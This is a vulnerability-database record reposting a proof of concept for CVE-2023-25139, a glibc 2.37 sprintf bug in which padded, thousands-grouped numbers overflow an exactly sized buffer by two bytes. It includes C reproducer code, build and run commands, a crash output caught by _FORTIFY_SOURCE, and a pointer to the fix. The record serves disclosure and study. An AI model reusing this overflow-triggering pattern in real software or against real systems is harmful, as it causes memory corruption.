{"uuid": "2d1a038d-8a94-47d9-b677-719df2714648", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-25139", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/2576", "content": "\ud83d\udd25\ud83d\udd25\ud83d\udd25glibc-2.37 - incorrect printf output for integers with thousands separator and width field (CVE-2023-25139, BOF)\nsprintf in the GNU C Library (glibc) 2.37 has a BOF (OOB) in some situations with a correct buffer size. This is unrelated to CWE-676. It may write beyond the bounds of the destination buffer when attempting to write a padded, thousands-separated string representation of a number, if the buffer is allocated the exact size required to represent that number as a string. For example, 1,234,567 (with padding to 13) overflows by two bytes.\n\nConsider the following C program:\n\n#include <locale.h>\n#include <stdio.h>\n\nint main (void)\n{\n  if (setlocale (LC_ALL, \"\"))\n    {\n      printf (\"1234567890123:\\n\");\n      /* width 13, left-justified, with ' requesting thousands grouping */\n      printf (\"%0+ -'13ld:\\n\", 1234567L);\n    }\n  return 0;\n}\n\nand try it with a locale that has a thousands separator, such as \"LC_ALL=en_US.utf8\".\n\nWith glibc up to 2.36, Vincent gets as expected:\n1234567890123:\n+1,234,567   :\n\nConfirmed that this could potentially cause a buffer overflow with sprintf, something like below.\nThis will occur in the corner case where an application computes the size of buffer to be exactly enough to fit the digits in question, but sprintf ends up writing a couple of extra bytes, hence going beyond bounds.\n\n#include <locale.h>\n#include <stdio.h>\n#include <string.h>\n\nint main (void)\n{\n  /* buffer sized exactly for the 14 expected characters plus the NUL */\n  char buf[strlen (\"1234567890123:\") + 1];\n  __builtin_memset (buf, 'x', sizeof (buf));\n  if (setlocale (LC_ALL, \"\"))\n    {\n      printf (\"1234567890123:\\n\");\n      printf (\"%0+ -'13ld:\\n\", 1234567L);\n      /* on glibc 2.37 this writes two bytes past the end of buf */\n      sprintf (buf, \"%0+ -'13ld:\", 1234567L);\n      for (size_t i = 0; i < strlen (\"1234567890123:\") + 1; i++)\n        {\n          printf (\"%c\", buf[i]);\n        }\n      printf (\"\\n\");\n    }\n  return 0;\n}\n\nTo finish, building with _FORTIFY_SOURCE should catch this problem immediately:\n\n\ud83d\udcbe$ gcc -D_FORTIFY_SOURCE=1 -O -o sprintf-test sprintf-test.c\n\nAnd run:\n\ud83d\udcbe$ LOCPATH=$PWD/localedata LC_ALL=en_US.UTF-8 ./elf/ld-linux-x86-64.so.2 --library-path .:./math:./elf:./dlfcn:./nss:./nis:./rt:./resolv:./mathvec:./support:./crypt:./nptl ../sprintf-test\n1234567890123:\n+1,234,567     :\n*** buffer overflow detected ***: terminated\nAborted (core dumped)\n\n\ud83d\udee1Fixed here (github mirror, backport to release/2.37/master): \"Account for grouping in printf width\".", "creation_timestamp": "2023-02-25T17:01:11.000000Z"}